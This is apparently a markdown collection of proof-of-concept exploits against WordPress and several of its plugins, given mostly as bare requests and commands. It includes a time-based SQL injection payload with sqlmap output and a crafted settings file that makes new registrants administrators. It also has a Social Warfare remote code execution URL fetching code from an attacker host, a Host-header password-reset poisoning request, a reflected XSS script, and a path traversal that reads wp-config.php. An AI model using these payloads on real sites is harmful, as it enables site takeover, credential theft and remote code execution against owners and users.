POC WP

poc wp.md

WordPress Plugin - Google Review Slider 6.1 SQL Injection

poc:

GET/wp-admin/admin.php?page=wp_google-templates_posts&tid=1&_wpnonce=***&taction=edit HTTP/1.1

sqlmap result:

sqlmap identified the following injection point(s) with a total of 62 HTTP(s) requests:
---
Parameter: tid (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=wp_google-templates_posts&tid=1 AND (SELECT 5357 FROM (SELECT(SLEEP(5)))kHQz)&_wpnonce=***&taction=edit

WordPress Plugin - Easy WP SMTP

file poc.txt.

a:2:{s:4:"data";s:81:"a:2:{s:18:"users_can_register";s:1:"1";s:12:"default_role";s:13:"administrator";}";s:8:"checksum";s:32:"3ce5fb6d7b1dbd6252f4b5b3526650c8";}

exploit poc:

$ curl https://REDACTED/wp-admin/admin-ajax.php -F 'action=swpsmtp_clear_log' -F 'swpsmtp_import_settings=1' -F 'swpsmtp_import_settings_file=@poc.txt'

WordPress Plugin - Social Warfare<=3.5.2 RCE

POC:

http://REDACTED/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://ATTACKER/code.txt&wpaa=phpinfo();

CVE-2017-6514

poc:

http://REDACTED/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fevil.com%2F&format=xml

CVE-2017-8295

POC:

curl -v 'http://REDACTED/wp-login.php?action=lostpassword' -H 'Host: vulnspy.com' --data 'user_login=admin&redirect_to=&wp-submit=Get+New+Password'

POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1
Host: injected-attackers-mxserver.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 56

user_login=admin&redirect_to=&wp-submit=Get+New+Password

CVE-2019-19133

POC:

http://redacted/?csshero_action=edit_page&rand=1015&foo%22%3E%3C/iframe%3E%3Cscript%3Ealert(%27Reflected%20XSS%20in%20CSS%20Hero%204.0.3%27)%3C/script%3E%3Ciframe%3Ebar

WordPress 5.1.1 Slider Revolution 4.6.5 UpdateCaptionsCSS Remote Content Injection

POC:

http://redacted/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php